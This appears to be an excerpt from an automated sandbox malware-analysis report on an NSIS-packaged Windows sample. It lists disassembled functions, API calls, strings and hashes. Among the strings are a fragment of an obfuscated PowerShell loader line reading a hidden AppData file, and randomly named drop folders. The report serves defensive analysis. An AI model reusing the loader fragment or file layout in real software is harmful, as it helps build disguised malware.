Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 3824989ea0536e5c3d89d87b24ed579d9185aa06a8fa494c1d573172a0034d7b
Instruction ID: 1ec4b4c3d0988b91a44b02e8c0f1a80d5eff4bd371306251f5288e66bb296ab7
Opcode Fuzzy Hash: 3824989ea0536e5c3d89d87b24ed579d9185aa06a8fa494c1d573172a0034d7b
Instruction Fuzzy Hash: 4FB139B1900608FFDB11AFA0DD89AAE7B79FB04354F40813AFA41B61A0CB744E51DF68

Function 00405C4D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ugpJX5h56S.exe"), ref: 00405C76
lstrcatW.KERNEL32(00424F10,\*.*,00424F10,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ugpJX5h56S.exe"), ref: 00405CBE
lstrcatW.KERNEL32(?,0040A014,?,00424F10,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ugpJX5h56S.exe"), ref: 00405CE1
lstrlenW.KERNEL32(?,?,0040A014,?,00424F10,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ugpJX5h56S.exe"), ref: 00405CE7
FindFirstFileW.KERNELBASE(00424F10,?,?,?,0040A014,?,00424F10,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ugpJX5h56S.exe"), ref: 00405CF7
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D97
FindClose.KERNEL32(00000000), ref: 00405DA6

Strings

\*.*, xrefs: 00405CB8
C:\Users\user\AppData\Local\Temp\, xrefs: 00405C5A
"C:\Users\user\Desktop\ugpJX5h56S.exe", xrefs: 00405C56

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\ugpJX5h56S.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-973625733
Opcode ID: 0b85f367639a69f5b614f98777155fba44d4349fb39831c7af8fd38ecdabae30
Instruction ID: c1737a7785d2a2f908f5f44de07c4aee1227101a85bdbc8c56ed50a571596083
Opcode Fuzzy Hash: 0b85f367639a69f5b614f98777155fba44d4349fb39831c7af8fd38ecdabae30
Instruction Fuzzy Hash: 3241C430800A14BADB216B65CD4DABF7678DF41758F14813BF802B21D1D77C4AC19EAE

Function 00406C5F Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61fa70d481ae7decb37dc56cf27f7a4c6ea5b826eb98dd3ad332090416f9cd2
Instruction ID: db5d81fcbfa5be4a2d8af1487b95e9640f9c883cb1993a3fcb30b22963867ec5
Opcode Fuzzy Hash: c61fa70d481ae7decb37dc56cf27f7a4c6ea5b826eb98dd3ad332090416f9cd2
Instruction Fuzzy Hash: 87F17871D04229CBDF28CFA8C8946ADBBB0FF44305F25816ED456BB281D7786A86CF45

Function 0040689E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(75923420,00425F58,00425710,00405F61,00425710,00425710,00000000,00425710,00425710,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 004068A9
FindClose.KERNEL32(00000000), ref: 004068B5

Strings

X_B, xrefs: 0040689F

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: X_B
API String ID: 2295610775-941606717
Opcode ID: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
Instruction ID: f67f359cedd367be1f2f51a398ada2a6aadcf11014009cc1af4821528039bb17
Opcode Fuzzy Hash: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
Instruction Fuzzy Hash: 68D0123251A5205BC64067396E0C84B7B58AF153717268A36F5AAF21E0CB348C6A969C

Function 004021CF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040224E

Strings

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Underfaldshjulet, xrefs: 0040228E

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Underfaldshjulet
API String ID: 542301482-3795260011
Opcode ID: df36e5e89259041d68a58c4485740a5fc484dee9eaff443b08a8b6a32abbd60f
Instruction ID: 7c9e104ca8be0d6b13ead4f97a80eb64338f0e545dbf3bddd9310e0b0504cb73
Opcode Fuzzy Hash: df36e5e89259041d68a58c4485740a5fc484dee9eaff443b08a8b6a32abbd60f
Instruction Fuzzy Hash: 54410575A00209AFCB00DFE4CA89AAD7BB5FF48318B20457EF505EB2D1DB799981CB54

Function 00402930 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040293F

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 7987dc06055d2fcbd6de0c389dd755b94e4b1d186a0c9c18156fcbaf8ea50e81
Instruction ID: 9ac6bcba1e22606d8a3f98507846f809c14ae5b1cd4137618ecf9cbbc0e374ac
Opcode Fuzzy Hash: 7987dc06055d2fcbd6de0c389dd755b94e4b1d186a0c9c18156fcbaf8ea50e81
Instruction Fuzzy Hash: D6F08C71A04115AFD710EBA4DA499AEB378EF14328F6001BBE116F31E5D7B88E419B29

Function 00403FC1 Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FFD
ShowWindow.USER32(?), ref: 0040401D
GetWindowLongW.USER32(?,000000F0), ref: 0040402F
ShowWindow.USER32(?,00000004), ref: 00404048
DestroyWindow.USER32 ref: 0040405C
SetWindowLongW.USER32(?,00000000,00000000), ref: 00404075
GetDlgItem.USER32(?,?), ref: 00404094
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040A8
IsWindowEnabled.USER32(00000000), ref: 004040AF
GetDlgItem.USER32(?,00000001), ref: 0040415A
GetDlgItem.USER32(?,00000002), ref: 00404164
SetClassLongW.USER32(?,000000F2,?), ref: 0040417E
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041CF
GetDlgItem.USER32(?,00000003), ref: 00404275
ShowWindow.USER32(00000000,?), ref: 00404296
KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042A8
EnableWindow.USER32(?,?), ref: 004042C3
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042D9
EnableMenuItem.USER32(00000000), ref: 004042E0
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042F8
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040430B
lstrlenW.KERNEL32(00422F08,?,00422F08,00000000), ref: 00404335
SetWindowTextW.USER32(?,00422F08), ref: 00404349
ShowWindow.USER32(?,0000000A), ref: 0040447D

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 121052019-0
Opcode ID: 4b3fe02cb5795506d30df4e66f46237e59566fdbff82c58b44480cf0eb866077
Instruction ID: f4824fcfb4375dbde2e3aa314f90dcffafac0cdac9d9fdfce080a9e5a5e1030c
Opcode Fuzzy Hash: 4b3fe02cb5795506d30df4e66f46237e59566fdbff82c58b44480cf0eb866077
Instruction Fuzzy Hash: E7C1CEB1600200BBCB216F61EE49E2B3A68FB95719F41053EF751B11F0CB795882DB2E

Function 00403C13 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406935: GetModuleHandleA.KERNEL32(?,00000020,?,0040362C,0000000C,?,?,?,?,?,?,?,?), ref: 00406947
Part of subcall function 00406935: GetProcAddress.KERNEL32(00000000,?), ref: 00406962

lstrcatW.KERNEL32(1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,75923420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\ugpJX5h56S.exe",00008001), ref: 00403C94
lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,75923420), ref: 00403D14
lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000), ref: 00403D27
GetFileAttributesW.KERNEL32(: Completed), ref: 00403D32
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis), ref: 00403D7B

Part of subcall function 00406488: wsprintfW.USER32 ref: 00406495

RegisterClassW.USER32(004289C0), ref: 00403DB8
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DD0
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E05
ShowWindow.USER32(00000005,00000000), ref: 00403E3B
GetClassInfoW.USER32(00000000,RichEdit20W,004289C0), ref: 00403E67
GetClassInfoW.USER32(00000000,RichEdit,004289C0), ref: 00403E74
RegisterClassW.USER32(004289C0), ref: 00403E7D
DialogBoxParamW.USER32(?,00000000,00403FC1,00000000), ref: 00403E9C

Strings

1033, xrefs: 00403C33, 00403C8F
RichEd32, xrefs: 00403E4F
_Nb, xrefs: 00403D97, 00403DFF
.exe, xrefs: 00403D21
RichEdit, xrefs: 00403E6E
: Completed, xrefs: 00403CDB, 00403CE4, 00403CF2, 00403D41, 00403D47
Control Panel\Desktop\ResourceLocale, xrefs: 00403C47
RichEdit20W, xrefs: 00403E5F, 00403E65
C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis, xrefs: 00403CA3, 00403CAB, 00403D4E, 00403D54, 00403D64
RichEd20, xrefs: 00403E41
C:\Users\user\AppData\Local\Temp\, xrefs: 00403C18
"C:\Users\user\Desktop\ugpJX5h56S.exe", xrefs: 00403C16
.DEFAULT\Control Panel\International, xrefs: 00403C7F

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\ugpJX5h56S.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-426851728
Opcode ID: b628336323bb02343b5fb0529852f76f357befb3686fccd2f1025f323f731d9b
Instruction ID: 5b9c441e0465166458f669e0e2db1e5d0b29f952519833dd96bf398df7fa21fd
Opcode Fuzzy Hash: b628336323bb02343b5fb0529852f76f357befb3686fccd2f1025f323f731d9b
Instruction Fuzzy Hash: E661D570600300BAD620AF66DD46F3B3A7CEB84B49F81453FF941B61E2CB795952CA6D

Function 004030A2 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004030B3
GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 004030CF

Part of subcall function 00406031: GetFileAttributesW.KERNELBASE(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
Part of subcall function 00406031: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057

GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 0040311B
GlobalAlloc.KERNELBASE(00000040,?), ref: 00403251

Strings

Null, xrefs: 00403199
Inst, xrefs: 00403187
C:\Users\user\AppData\Local\Temp\, xrefs: 004030A9
Error launching installer, xrefs: 004030F2
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403278
C:\Users\user\Desktop, xrefs: 004030FD, 00403102, 00403108
"C:\Users\user\Desktop\ugpJX5h56S.exe", xrefs: 004030A8
soft, xrefs: 00403190

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\ugpJX5h56S.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-1044626659
Opcode ID: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
Instruction ID: 0f45a59523ef10b9f6d61eaf83b2f91e1f12d324a613ce28672a4e7bf9d48b30
Opcode Fuzzy Hash: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
Instruction Fuzzy Hash: 7B51B071A01304AFDB209F65DD86B9E7FACAB08356F20417BF504B62D1CB789E818B5D

Function 0040657E Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 204
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004066A0
GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,matrices,?,?,00000000,00000000,00418EC0,00000000), ref: 004066B6
SHGetPathFromIDListW.SHELL32(00000000,: Completed), ref: 00406714
CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040671D
lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch,00000000,matrices,?,?,00000000,00000000,00418EC0,00000000), ref: 00406748
lstrlenW.KERNEL32(: Completed,00000000,matrices,?,?,00000000,00000000,00418EC0,00000000), ref: 004067A2

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00406671
matrices, xrefs: 004065A2
"$Chromoleucite=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Ectomeric252.Cui';$Syncran, xrefs: 00406777
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406742
: Completed, xrefs: 004065AB, 00406665, 0040666C, 00406670, 00406689, 0040668A, 0040669F, 004066B5, 004066E6, 00406712, 00406747, 0040674D, 0040676A, 0040677D, 0040679B, 004067A1, 004067AA, 004067DF

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
String ID: "$Chromoleucite=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Ectomeric252.Cui';$Syncran$: Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$matrices
API String ID: 4024019347-2176313454
Opcode ID: fc1dd504962f454d72de7fc8bd3fa5b90e0c752258918fd1551a188d423c3a78
Instruction ID: 9d84e59ac7151f7caf92dcd2fae633819e279481621c74ff0a59597acd22528a
Opcode Fuzzy Hash: fc1dd504962f454d72de7fc8bd3fa5b90e0c752258918fd1551a188d423c3a78
Instruction Fuzzy Hash: 46612471A047119BD7209F28DC80B7A77E4AF58328F65053FF686B32D0DA3C89A5875E

Function 00401794 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,%Konstituerende176%\presatisfaction,C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Underfaldshjulet,?,?,00000031), ref: 004017D5
CompareFileTime.KERNEL32(-00000014,?,%Konstituerende176%\presatisfaction,%Konstituerende176%\presatisfaction,00000000,00000000,%Konstituerende176%\presatisfaction,C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Underfaldshjulet,?,?,00000031), ref: 004017FA

Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E

Part of subcall function 004055C6: lstrlenW.KERNEL32(matrices,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
Part of subcall function 004055C6: lstrlenW.KERNEL32(00403412,matrices,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
Part of subcall function 004055C6: lstrcatW.KERNEL32(matrices,00403412,00403412,matrices,00000000,00418EC0,00000000), ref: 00405621
Part of subcall function 004055C6: SetWindowTextW.USER32(matrices,matrices), ref: 00405633
Part of subcall function 004055C6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
Part of subcall function 004055C6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
Part of subcall function 004055C6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681

Strings

eksegeternes, xrefs: 0040185A, 00401876
lftninger\slangetmmerens, xrefs: 00401846, 00401864
